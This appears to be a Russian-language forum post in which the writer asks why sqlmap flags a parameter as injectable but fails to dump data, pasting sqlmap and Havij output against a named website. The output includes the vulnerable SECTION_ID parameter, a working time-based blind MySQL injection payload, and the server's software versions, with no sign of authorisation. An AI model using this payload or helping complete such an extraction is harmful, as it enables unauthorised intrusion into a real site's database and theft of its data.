Ну раз он говорит, что "is vulnerable", почему не раскручивает скулю?

Sqlmap:

GET parameter 'SECTION_ID' is vulnerable. Do you want to keep testing the others

? [y/N] y

sqlmap identified the following injection points with a total of 60 HTTP(s) requ

ests:

---

Place: GET

Parameter: SECTION_ID

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: SECTION_ID=2') AND SLEEP(5) AND ('hJWR'='hJWR

---

[13:01:32] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.6, Nginx

back-end DBMS: MySQL 5.0.11

[13:01:32] [INFO] fetching current database

[13:01:32] [INFO] retrieved:

current database: None

[13:01:37] [INFO] Fetched data logged to text files under 'C:\Python27\sqlmap-0.

9\sqlmap\output\www.opin.ru'

Havij

Selected Column Count is 2

Retying to find string column

Retying to find string column

Retying to find string column

Retying to find string column

Retying to find string column

Valid String Column is 1

DB Server: unknown

Finding current data base

Database type was not recognized, Injection Failed!